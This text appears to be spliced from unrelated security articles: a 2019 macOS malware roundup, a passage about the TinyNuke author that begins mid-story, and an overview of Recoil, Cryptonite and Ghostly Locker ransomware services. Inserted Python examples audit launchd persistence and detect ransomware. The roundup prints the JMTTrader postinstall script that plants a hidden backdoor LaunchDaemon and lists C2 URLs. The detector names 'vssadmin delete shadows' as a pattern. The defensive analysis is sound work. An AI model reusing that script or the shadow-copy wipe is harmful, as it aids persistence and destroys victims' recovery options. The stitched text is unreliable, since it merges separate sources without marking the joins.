MacOS Malware Outbreaks 2019 | The Second 6 Months

Earlier this year, we did a roundup of the first 6 months of MacOS malware in 2019, noting that there had been quite an uptick in outbreaks, from a return of OSX.Dok and Lazarus to new cryptominers, a fake WhatsApp trojan and the rapid development of a macOS bug which allowed remotely-hosted attacker code to execute on a local machine without warning from Gatekeeper. So what have attackers been up to since then, and what new tricks and tips do defenders need to be aware of? Let’s take a look at macOS malware from July to December, 2019.

image macos malware second half 2019

OSX/Tarmac – What’s New?

The early months of the second half of 2019 were encouraging for defenders. We didn’t see any new outbreaks through July and August, although there was plenty of increased activity from known threats, which we will mention later. The first sign of something stirring was a report of what was claimed to be a new malware threat dubbed “Tarmac” by researchers at Confiant, which sent many of us scrambling for a sample. The story was picked up by ZDNet and a few other outlets a few weeks later.

In their initial report, Confiant did link to a long list of known Shlayer samples, and reported that their Tarmac sample was a second stage payload that was sometimes, but not reliably, dropped by some of those.

With Confiant’s assistance (much thx @lordx64 🙂 ), we were finally able to get a look at the sample they labelled Tarmac, and which is now also available on VirusTotal.

image of osx tarmac on virustotal

There’s no doubt that this is malware, but our analysis showed it to be a variant of what at SentinelOne we internally call “BundleMeUp”, and which is more widely known as “Mughthesec”. Patrick Wardle did a nice write up of the first variant back in 2017, which we detect as OSX.BundleMeUp.A. The “B” variant analysed by Confiant is only one of eight variants detected by us since 2018.

Nevertheless, Confiant did a very nice technical analysis here, which is well worth a read for anyone interested in learning macOS malware reverse engineering.

At the time of their analysis, Confiant weren’t seeing any detections for the sample on VirusTotal, perhaps leading them to assume they had discovered something new. Alas, as VT themselves warn, it’s an error to take the findings on VT as indicative of what vendors’ actual engines really detect. That’s because many of the engines supplied to VT are limited versions of what vendors actually supply to their own customers.

Sample: 3dd5a87482f46e88fc8a8f849f21768646af987100fd38c1a0bcc2a6a8a5a073

Lazarus Take 1: OSX/GMERA, Stockfoli

September was not without real incident, however, as the first in a series of Lazarus macOS malware samples came to light in the form of OSX.GMERA. Since we wrote this up at the time, we’ll refer readers to our post here on SentinelLabs rather than repeat the whole analysis here.

Here’s the malicious run.sh script that is hidden in the Resources folder and contains base64-encoded content. The obfuscated code drops a hidden plist file called .com.apple.upd.plist in the user’s ~/Library/LaunchAgents folder.

image of Lazarus Stockfoli malware

However, the tl;dr was that the threat actors had bundled a real stock and crypto portfolio app inside their own almost identically named trojan app. Unsuspecting users running the malware would be presented with all the functionality of the real app, but unwittingly install a backdoor allowing the cybercriminals full access to their device through a reverse shell.

Sample: d2eaeca25dd996e4f34984a0acdc4c2a1dfa3bacf2594802ad20150d52d23d68

Lazarus Take 2: JMTTrader

Almost exactly a month after news broke about OSX.GMERA came another Lazarus discovery: JMTTrader. Following a pattern seen earlier with Celas Trade Pro, JMTTrader appears to be a completely fake organization set up with the express purpose of swindling unwary users out of cryptocurrency.

A fake company website offering “Advanced trading functions for cryptocurrency traders that includes: technical and fundamental analysis, automated trading and many other innovative features” was used to lure victims to a Github repo containing malware hidden inside an otherwise functional application.

Distributed in the form of an Apple disk image, the .dmg file contained a package which installed the trading app along with the malware, hidden inside the innocent-sounding CrashReporter executable installed at /Library/JMTTrader/CrashReporter. For persistence, a root-level LaunchDaemon is dropped at /Library/LaunchDaemons/org.jmttrading.plist, as the package’s postinstall script shows:

#!/bin/sh
# Move the dot-prefixed (hidden) plist out of the app bundle into the root-level LaunchDaemons folder
mv /Applications/JMTTrader.app/Contents/Resources/.org.jmttrading.plist /Library/LaunchDaemons/org.jmttrading.plist
chmod 644 /Library/LaunchDaemons/org.jmttrading.plist
# Stage the hidden backdoor binary under /Library and make it executable
mkdir /Library/JMTTrader
mv /Applications/JMTTrader.app/Contents/Resources/.CrashReporter /Library/JMTTrader/CrashReporter
chmod +x /Library/JMTTrader/CrashReporter
# Start the backdoor immediately in the background; the LaunchDaemon keeps it running after reboot
/Library/JMTTrader/CrashReporter Maintain &

Here we take a look at the package using the excellent Suspicious Package inspection tool:

gif image of Lazarus JMT Trader malware

According to this analysis, which is worth reading in full, the CrashReporter executable opens a backdoor to an encrypted C2 server at https://beastgoc.com/grepmonux.php and appears to have the ability to execute commands, write files and exfiltrate data.

image of Lazarus JMT Trader malware

Sample: 4d6078fc1ea6d3cd65c3ceabf65961689c5bc2d81f18c55b859211a60c141806

Lazarus Take 3: FlashUpdateCheck, Album.app

Hot on the heels of JMTTrader came another, different Lazarus find from @cyberwar_15, packaged in the form of an application called “Album.app”.

image of Lazarus Album tweet

Although this malware only came to light in October, it was signed during, and presumably in circulation since, May of this year.

image of Lazarus Album app malware

The Album.app presents itself as a Macromedia Flash player and does indeed present an “album” of pictures, showing a portfolio of images of young Asian and Korean girls. Meanwhile, it also installs a persistence agent at ~/Library/LaunchAgents/com.adobe.macromedia.flash.plist bearing the label FlashUpdate. A hidden mach-o binary is also deposited at ~/.FlashUpdateCheck, which functions as the Program Argument for the Launch Agent.

The FlashUpdateCheck executable calls out to the following URLs:

https://crabbedly.club/board.php
https://craypot.live/board.php
https://indagator.club/board.php

image of Lazarus flash update check malware

Although these were no longer live during our analysis, research suggests that the payload is the same backdoor payload we described earlier this year here.

Sample: d91c233b2f1177357387c29d92bd3f29fab7b90760e59a893a0f447ef2cb4715

Lazarus Take 4: UnionCryptoTrader

2019 is still not done seeing Lazarus activity on macOS, however, and December has seen yet another variant, UnionCryptoTrader.

This malware seems like a duplicate of the JMTTrader scam, complete with fake company website and a disk image with a malicious package hidden inside a purpose-built, “innocent” parent application. However, there are significant differences.

First, while the postinstall script in the package takes an almost identical form, save for changing the filenames from .CrashReporter and .org.jmttrading.plist to .unioncryptoupdater and .vip.unioncrypto.plist, the LaunchDaemon Program Arguments also drop the Maintain argument, possibly to avoid earlier detection algorithms.

A diff of the code in the two backdoor executables, however, shows they are very different, and the newer mach-o reveals some (possibly intentional) breadcrumbs like macmini and Barbeque in the strings.

/Volumes/Work/Loader/macos/Barbeque/
barbeque.cpp
/Users/macmini/Library/Developer/Xcode/DerivedData/macloader-

More interesting is that the newer .unioncryptoupdater imports an API allowing the attackers to mimic “fileless” malware:

image of Lazarus trader malware

This shows an interesting development and marks out UnionCryptoTrader as a significant re-tooling from the earlier JMTTrader code.

Sample: 2ab58b7ce583402bf4cbc90bee643ba5f9503461f91574845264d4f7e3ccb390

What Else Happened in macOS Malware in 2019?

The second half of 2019 was, in some respects, quiet in terms of outbreaks, with APT Lazarus stealing the show (and the money) and little evidence of other APTs or new actors targeting macOS coming to light, thankfully. That said, there was also a clear trend over the last 6 months of known-actors changing tactics and becoming more aggressive at the same time.

Commodity macOS adware/malware (it’s becoming difficult to separate the two) has shown some important trends over the last 6 months or so. First, perhaps in response to Apple’s Notarization and other security enhancements, threat actors have become far more blatant in simply instructing users on how to disable their own built-in protections.

image how to bypass mac os security

Second, we’re seeing a rising trend of cybercriminals offering up executables that eschew the typical Apple format of a bundle containing a mach-o executable. Instead, they are increasingly serving up executable scripts that dump a first-stage mach-o payload in the /tmp folder, execute it in order to download the second-stage adware, PUP or malware, and then delete the initial stager.

Thirdly, as we’ve mentioned before, 2019 has seen bad actors target users in more aggressive ways, running malware from /var/root and dropping multiple persistence agents to thwart removal by simple end user tools.

Prior to 2019, we rarely saw macOS malware developers using anything other than plain-to-see LaunchDaemons and LaunchAgents. This year, we’ve seen more incidents of these being hidden with a dot prefix and/or chflags to conceal persistence agents from inspection in the Finder. We’ve also seen an uptick in the use of cron jobs for persistence. As some of the legacy and lower-end protection tools catch up to these basic tricks, we expect the bad actors to up their game in 2020 and increase their sophistication.
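As an added example (not SentinelOne’s code), here is a small Python audit of launchd persistence that looks for the tricks described in this roundup: the dot-prefixed plist GMERA drops, the root LaunchDaemon staged by the JMTTrader/UnionCryptoTrader postinstall script, the Adobe-looking LaunchAgent of Album.app with its mismatched FlashUpdate label and hidden ~/.FlashUpdateCheck binary, programs running from /tmp or /var/root, and the chflags hidden flag. The trusted and staging path lists are assumptions, and the fixture plists written by build_samples are reconstructions for the demo (the GMERA program path in particular is constructed, since the post does not give it).

```python
import os
import plistlib
import stat
import tempfile
from pathlib import Path

# Assumption: a legitimate launchd job's executable normally lives under one of these.
TRUSTED_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Applications/", "/Library/Apple/")
# Staging locations named in the roundup: /tmp for script stagers, /var/root for root-level malware.
SUSPECT_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/var/root/", "/private/var/root/")
# Vendor prefixes the described samples borrow for their labels or file names.
IMPERSONATED = ("com.apple.", "com.adobe.")

def has_hidden_flag(path: Path) -> bool:
    """True when the BSD UF_HIDDEN flag (set by `chflags hidden`) is present; False on Linux."""
    return bool(getattr(path.lstat(), "st_flags", 0) & stat.UF_HIDDEN)

def program_of(job: dict) -> str:
    """Executable a launchd job runs: Program wins over ProgramArguments[0]."""
    if job.get("Program"):
        return str(job["Program"])
    args = job.get("ProgramArguments") or []
    return str(args[0]) if args else ""

def audit_plist(path: Path) -> list:
    """Return the indicators found in one LaunchAgent/LaunchDaemon plist."""
    findings = []
    if path.name.startswith("."):
        findings.append("dot-prefixed plist name")
    if has_hidden_flag(path):
        findings.append("plist has UF_HIDDEN set")
    try:
        with path.open("rb") as fh:
            job = plistlib.load(fh)
    except Exception as exc:  # not a plist, or deliberately malformed
        return findings + [f"unparseable plist ({exc.__class__.__name__})"]
    label = str(job.get("Label", ""))
    stem = path.stem.lstrip(".")  # ".com.apple.upd.plist" -> "com.apple.upd"
    prog = os.path.expanduser(program_of(job))
    if not prog:
        return findings + ["no Program or ProgramArguments"]
    if Path(prog).name.startswith("."):
        findings.append("program is a dot-prefixed (hidden) file")
    if prog.startswith(SUSPECT_PREFIXES):
        findings.append("program runs from a staging directory")
    elif not prog.startswith(TRUSTED_PREFIXES):
        findings.append("program outside trusted locations")
    vendor_like = label.startswith(IMPERSONATED) or stem.startswith(IMPERSONATED)
    if vendor_like and not prog.startswith(TRUSTED_PREFIXES):
        findings.append("Apple/Adobe-style name but program is not Apple/Adobe software")
    if label and label != stem:
        findings.append("Label does not match plist file name")
    if Path(prog).exists() and has_hidden_flag(Path(prog)):
        findings.append("program has UF_HIDDEN set")
    return findings

def audit_dirs(dirs) -> dict:
    """Audit every *.plist (hidden ones included) in the given directories."""
    report = {}
    for d in map(Path, dirs):
        if not d.is_dir():
            continue
        for entry in sorted(d.iterdir()):
            if entry.is_file() and entry.suffix == ".plist":
                found = audit_plist(entry)
                if found:
                    report[str(entry)] = found
    return report

def build_samples(root: Path) -> list:
    """Write constructed fixtures modelled on the jobs described in the roundup
    (reconstructions for this demo, not the real artefacts) and return the dirs to audit."""
    agents, daemons = root / "LaunchAgents", root / "LaunchDaemons"
    samples = {
        # JMTTrader-style root daemon dropped by the postinstall script
        daemons / "org.jmttrading.plist": {"Label": "org.jmttrading", "RunAtLoad": True,
                                           "ProgramArguments": ["/Library/JMTTrader/CrashReporter", "Maintain"]},
        # Album.app: Adobe-looking file name, different Label, hidden binary in $HOME
        agents / "com.adobe.macromedia.flash.plist": {"Label": "FlashUpdate", "RunAtLoad": True,
                                                      "ProgramArguments": ["~/.FlashUpdateCheck"]},
        # GMERA-style dot-prefixed plist with an Apple-looking label (program path is constructed)
        agents / ".com.apple.upd.plist": {"Label": "com.apple.upd",
                                          "ProgramArguments": ["/tmp/.upd", "-r"]},
        # Benign control entry: trusted binary, Label matches file name
        agents / "com.example.backup.plist": {"Label": "com.example.backup",
                                              "ProgramArguments": ["/usr/bin/rsync", "-a", "/src/", "/dst/"]},
    }
    for path, content in samples.items():
        path.parent.mkdir(parents=True, exist_ok=True)
        with path.open("wb") as fh:
            plistlib.dump(content, fh)
    return [agents, daemons]

def demo() -> dict:
    """Build the fixtures in a temp dir and return findings keyed by plist file name."""
    with tempfile.TemporaryDirectory() as tmp:
        report = audit_dirs(build_samples(Path(tmp)))
    return {Path(p).name: found for p, found in report.items()}

if __name__ == "__main__":
    print(demo())
```

On a real Mac, point audit_dirs at /Library/LaunchDaemons, /Library/LaunchAgents and ~/Library/LaunchAgents; every finding is a review prompt, not a verdict.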

Conclusion

It’s been a year of two halves on the macOS malware outbreaks front. The first six months showed a number of diverse actors ready, willing and able to spend time and effort targeting macOS users. From July onwards, however, the main APT threat actor has been North-Korean backed Lazarus / Hidden Cobra, while a relentless plague of known but evolving commodity malware, adware and PUPs seems to be coalescing into a symbiotic group ready to sell PPI installs to each other and share the profits.

One thing remains clear, though: whether it’s commodity malware socially engineering users into bypassing the built-in macOS security controls, or advanced persistent threat groups setting up fake companies and developing functional apps in order to deliver hidden malware, there has never been more need to ensure that your endpoints do not rely on reputational, signature-based software that can only recognize threats that have already been revealed. To stay truly protected, an active EDR solution that blocks malicious behaviour regardless of its source or origin is the only way to protect the integrity of your data, services and customers.



“He didn’t do it for money,” said Daniel Inzirillo, whose CV shows he has built an impressive career in computer programming and working for various financial institutions. “He did it to spite all the cyber shitheads. The idea was that they wouldn’t be able to sell his software anymore because it was now free for grabs.”

If Augustin Inzirillo ever did truly desire to change his ways, it wasn’t clear from his apparent actions last summer: The Le Parisien story says the sextortion scams netted the Frenchman and his co-conspirator at least a million Euros.

In August 2018, KrebsOnSecurity was contacted by a researcher working with French authorities on the investigation who said he suspected the young man was bragging on Twitter that he used a custom version of Nuclear Bot dubbed “TinyNuke” to steal funds from customers of French and Polish banks.

The source said this individual used the now-defunct Twitter account @tiny_gang1 to taunt French authorities, while showing off a fan of 100-Euro notes allegedly gained from his illicit activities (see image above). It seemed to the source that Inzirillo wanted to get caught, because at one point @tiny_gang1 even privately shared a copy of Inzirillo’s French passport to prove his identity and accomplishments to the researcher.

“He modified the Tinynuke’s config several times, and we saw numerous modifications in the malware code too,” the source said. “We tried to compare his samples with the leaked code available on GitHub and we noticed that the guy actually was using a more advanced version with features that don’t exist in the publicly available repositories. As an example, custom samples have video recording functionality, socks proxy and other features. So the guy clearly improved the source code and recompiled a new version for every new campaign.”

The source said the person behind the @tiny_gang Twitter account attacked French targets with custom versions of TinyNuke in one to three campaigns per week earlier this year, harvesting French bank accounts and laundering the stolen funds via a money mule network based mostly in the United Kingdom.

“If the guy behind this campaign is the malware author, it could easily explain the modifications happening with the malware, and his French is pretty good,” the researcher told KrebsOnSecurity. “He’s really provocative and I think he wants to be arrested in France because it could be a good way to become famous and maybe prove that his malware works (to resell it after?).”

The source said the TinyNuke author threatened him with physical harm after the researcher insulted his intelligence while trying to goad him into disclosing more details about his cybercrime activities.

“The guy has a serious ego problem,” the researcher said. “He likes when we talk about him and he hates when we mock him. He got really angry as time went by and started personally threatening me. In the last [TinyNuke malware configuration file] targeting Poland we found a long message dedicated to me with clear physical threats.”

All of the above is consistent with the findings detailed in the Le Parisien report, which quoted French investigators saying Antoine I. in October 2019 used a now-deleted Twitter account to taunt the authorities into looking for him. In one such post, he included a picture of himself holding a beer, saying: “On the train to Naples. You should send me a registered letter instead of threatening guys informally.”

The Le Parisien story also said Antoine I. threatened a researcher working with French authorities on the investigation (the researcher is referred to pseudonymously as “Marc”).

“I make a lot more money than you, I am younger, more intelligent,” Antoine I. reportedly wrote in July 2018 to Marc. “If you do not stop playing with me, I will put a bullet in your head.”

French authorities say the defendant managed his extortion operations while traveling throughout Ukraine and other parts of Eastern Europe. But at some point he decided to return home to France, despite knowing investigators there were hunting him. According to Le Parisien, he told the French authorities he wanted to cooperate in the investigation and that he no longer wished to live like a fugitive.

Ransomware as a Service | What are Cryptonite, Recoil and Ghostly Locker?

A short while back we posted a two-part blog series on a new RaaS (Ransomware as a Service) offering, “Project Root”. If you have not had a chance to peruse Part 1 and Part 2 of that series, we highly recommend doing so. That aside, “Project Root” happens to be just one of many in a recent uptick in “publicly” available RaaS offerings. In recent months, we have been tracking others as well and would like to take this opportunity to provide a high-level overview of three of the more notable examples, all of which market themselves with a style and pitch typical of legitimate consumer marketing. In this post, we will explore the following:

  • Recoil Ransomware
  • Cryptonite
  • Ghostly (aka Ghostly Locker)

      image RaaS Cryptonite

      Recoil Ransomware

      Recoil popped up for sale in various forums in early November 2019. Like Project Root, the main draw is a low buy-in price and a fairly standard feature set.

      image recoil banner

      Early advertisements for Recoil touted the following:

      image recoil features

      image recoil discord forum

      All these features are fairly standard for a modern RaaS service and should be taken with a healthy dose of scepticism. Claims to be “fully undetectable” (aka FUD) are misleading and only indicate two possible anti-detection capabilities. First, the developers can provide the buyer with a uniquely compiled stub that has yet to be subjected to public testing sites like VirusTotal. That means legacy AV solutions that rely on reputation for detection, such as by checking the binary’s hash, can indeed be easily bypassed. Second, some ransomware vendors offer to frequently update their code/stubs in order to stay ahead of the ‘detection curve’ – signature rules like Yara and similar that rely on detecting particular sequences of bytes or strings in an executable. However, neither of these avoidance techniques gives the ransomware true “FUD” capabilities if the security solution uses advanced behavioural detection.

      Recoil also offers the ability to function (i.e. encrypt) offline, which is attractive to criminals for a few reasons, not the least of which is that it can make the payloads less ‘noisy’. That is, if there is no anomalous traffic reaching out to obviously suspicious .onion sites, then simple security controls that would be triggered by that sort of thing (IPS/IDS/Firewalls, etc.) can fail to generate alerts. Beyond that, staying offline may offer some improvement in speed by forgoing network status checks or delays while reaching out to an attacker’s server each time the payload executes. 

      As stated, Recoil’s feature set is rather standard. The deletion of shadow copies is very common and can greatly impact a victim’s ability to recover from such an attack if they are not able to restore from another form of known-good backup or if they lack a modern security solution that blocks that behaviour at source.

      Current data indicates that Recoil supports Windows (x86 / x64) as well as Android. The developers are hoping to net $500.00 USD per sale, which – they say – includes support for Windows and Android platforms.

      Cryptonite Ransomware

      image cryptonite banner

      Cryptonite began advertising in forums (.onion based) a little later than Recoil, in early December 2019. They tout a fairly robust feature set, as well as a ‘deal’ to preview the system before committing to purchasing a full subscription package. By creating an account on their system, would-be ransomware criminals are able to get ‘preview’ builds which are fully functional. The idea here seems to be to offer the ability to generate income from the preview that the “buyers” would in turn use to pay for the full package.

      image cryptonite features

      The developers behind Cryptonite also appear to be offering a special deal to the first 1000 customers. The marketing is somewhat fascinating (from a security research perspective) in that they are highlighting “features” which very much focus on the exact points that security professionals recognize as the most dangerous.

      Specifically, they repeatedly highlight the point that “No Coding Skill” is required. That particular aspect is one of the main reasons we call attention to these. The barrier to entry is almost zero, meaning anyone tempted by criminal gains can rapidly cause a great deal of damage in very little time (seconds). The greatest danger with these kinds of RaaS offerings is that an attacker only needs to know how to download files to start the infectious ball rolling.

      Cryptonite is currently advertising the following core features:

      • Zero ransom fees – Packages are based on “infection credits”
      • Fully Undetectable – AV Evasion
      • Unique Encryption Keys – Unique encryption keys for each infection. This aims to prevent decryption tools or use of leaked keys
      • No Coding Skills Needed – Buyers build and download payloads from the portal. No programming / coding required
      • Increasing Ransom – Ransom increases over time or per defined criteria
      • Custom File infection (append your own binaries)
      • VSS / Shadow Copy Disabling / Deletion – Attempts to delete Volume Shadow Copies to prevent OS-based remediation
      • Network Infection Option – Worm’esque feature. Attempts to identify open network shares to spread to and infect.
      • Windows Only (x86/x64)

      image cryptonite abilities

      Cryptonite offers a full management and tracking portal and a number of features which put it ahead of Recoil in terms of attractiveness to a criminal audience. The pricing model is a little different with Cryptonite as well. Rather than taking a cut from each received ransom or charging an “entry fee”, they sell packages of what they refer to as “infection credits”. Each infected victim equals one credit. Would-be threat actors pay more for a package that allows them to infect more victims.

      Cryptonite pricing currently ranges from $195.00 to $895.00 USD and sets a limit on the amount of ransom that can be demanded per victim in each tier, from $150 to $250. For that, would-be criminals can infect between 50 and 200 victims and potentially make between $7,500 – $50,000 in total.

      The network infection and “advanced tracking” features are only included in the highest-price tier.

      image cryptonite pricing

      Along with all this, Cryptonite claims to offer 24×7 “support” via email, web-form, or even chat (when the admins are online).

      image cryptonite support

      Ghostly Locker Ransomware

      Rounding out our overview of RaaS projects is Ghostly, aka Ghostly Locker, ransomware.

      image Ghostly Locker banner

      Ghostly first appeared for sale in mid-November 2019. Similar to Recoil and Cryptonite, it is presented as a very slick and full-featured offering.

      image Ghostly Locker features

      Currently, Ghostly Locker claims to provide the following primary feature set:

      • Silent, Multi-Threaded Encryption
      • Customizable Disk Encryption (full or partial)
      • Customizable Target Extension List
      • Automation of Client Payments
      • Ransom Amount Doubling (after 72 hours)
      • TOR Portal-based Infection Tracking and Management
      • Detailed Campaign Statistics
      • Windows Only Support (x86/x64)
      • Purchase via Direct Payment (BTC) or Escrow via specific advertised forums.

      Ghostly’s pricing model is more ‘traditional’ in that they require an up-front entry fee from those looking to buy ransomware. The more a buyer is willing to pay, the more features they are offered, as well as more time and greater volume of potential infections.

      image Ghostly Locker pricing

      The Ghostly Locker FAQ provides further detail on specific features as well as information around their pricing plans and payment processing.

      image Ghostly Locker FAQ

      The Ghostly Locker dashboard is bloat-free and functional.

      image Ghostly Locker Dashboard

      The ‘Build’ section is where the magic happens. Short and to the point, it does the job. The user has options to enter or update the payment bitcoin address, as well as the payment amount. 

      It is also possible to toggle between full or partial disk encryption. Full disk encryption is slower, and according to the RaaS developer, should be used “when you want to make sure that the files are never recovered.” They notably also state that Full Disk Encryption is “ideal for targeted campaigns”. Ghostly Locker claims to run through encryption on a disk in 1 minute, on average. This is common with most modern ransomware families. It takes very little time to do a great deal of damage. If you think you have a minute or two to adjust and avoid encryption, or if your EDR solution relies on cloud-lookups to convict bad behavior, that can become a problem, very quickly.
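      As an added illustration of the on-device, behaviour-based detection argued for above (this is example code written here, not code from the page or from any SentinelOne product): the detector flags the shadow copy deletion that Recoil and Cryptonite advertise, and a burst of extension-changing renames like the one-minute encryption Ghostly Locker claims, without a hash lookup or a cloud round-trip. The event format, thresholds and sample event stream are constructed assumptions.

```python
from collections import defaultdict, deque
import os
import re
# Command lines used to wipe Volume Shadow Copies (ATT&CK T1490). A freshly
# compiled stub defeats hash reputation, but this behaviour is identical in
# every build, so the behaviour, not the hash, is what we match on.
SHADOW_COPY_PATTERNS = [
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
]

# Thresholds are assumptions for this example, not figures from the page:
# more than RATE_LIMIT extension-changing renames by one process within
# WINDOW_SECONDS is treated as mass encryption in progress.
WINDOW_SECONDS = 10.0
RATE_LIMIT = 20

def is_shadow_copy_deletion(cmdline):
    """True when a process command line matches a shadow-copy wipe."""
    return any(p.search(cmdline) for p in SHADOW_COPY_PATTERNS)

def changes_extension(old_path, new_path):
    """True when a rename replaces or appends the file extension."""
    return os.path.splitext(old_path)[1].lower() != os.path.splitext(new_path)[1].lower()

def detect(events):
    """Scan (timestamp, pid, kind, detail) events entirely on the endpoint.

    kind "process": detail is the command line.
    kind "rename":  detail is (old_path, new_path).
    Returns [(pid, reason), ...] with one alert per process and reason.
    """
    alerts, seen = [], set()
    recent = defaultdict(deque)  # pid -> timestamps of extension-changing renames
    for ts, pid, kind, detail in events:
        if kind == "process" and is_shadow_copy_deletion(detail):
            key = (pid, "shadow_copy_deletion")
        elif kind == "rename" and changes_extension(*detail):
            window = recent[pid]
            window.append(ts)
            while ts - window[0] > WINDOW_SECONDS:  # drop renames outside the window
                window.popleft()
            if len(window) <= RATE_LIMIT:
                continue
            key = (pid, "mass_rename")
        else:
            continue
        if key not in seen:
            seen.add(key)
            alerts.append(key)
    return alerts

# Constructed sample stream: pid 1001 is a user renaming three files; pid 4242
# wipes shadow copies, then re-extensions 30 documents in under three seconds.
SAMPLE_EVENTS = (
    [(float(i), 1001, "rename", (f"C:\\docs\\draft{i}.docx", f"C:\\docs\\final{i}.docx")) for i in range(3)]
    + [(5.0, 4242, "process", "vssadmin.exe delete shadows /all /quiet")]
    + [(5.1 + 0.1 * i, 4242, "rename", (f"C:\\docs\\doc{i}.docx", f"C:\\docs\\doc{i}.docx.locked")) for i in range(30)]
)
```

      Running detect(SAMPLE_EVENTS) raises both alerts for pid 4242 and none for the user process, because the benign renames keep their extension.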

      image Ghostly Locker download

      We will cover details on the payloads generated from Ghostly Locker in a separate, upcoming, blog post.

      Conclusion

      What is particularly concerning about this latest rash of ransomware projects is the way they borrow ideas from modern marketing practice in a clear effort to attract first-time buyers and to increase confidence among individuals who might otherwise have only been curious. When highly-skilled criminals are broadening their appeal to zero-skill, would-be villains with slick and seductive marketing tricks, it is a worrying sign that 2019’s wave of ransomware attacks looks likely not only to continue, but – if these kinds of RaaS campaigns are successful – threaten to become worse in 2020.

      Whether the highly-skilled actors behind these kinds of projects are just themselves ordinary criminals or also have a vested interest in encouraging an increase in ransomware attacks for other purposes is an interesting question in light of our recent discovery of links between APTs and crimeware.

      However that may be, SentinelOne’s on-device, endpoint protection is fully capable of preventing infection from Ghostly Locker, Recoil, Cryptonite and other forms of ransomware without reliance on cloud detection. Organizations that have moved beyond depending on legacy AV suites can avoid falling victim to the ransomware plague, but those that haven’t need to catch up quickly. As this review shows, the criminals sense a “goldrush” and some of them are only too happy to sell the shovels.
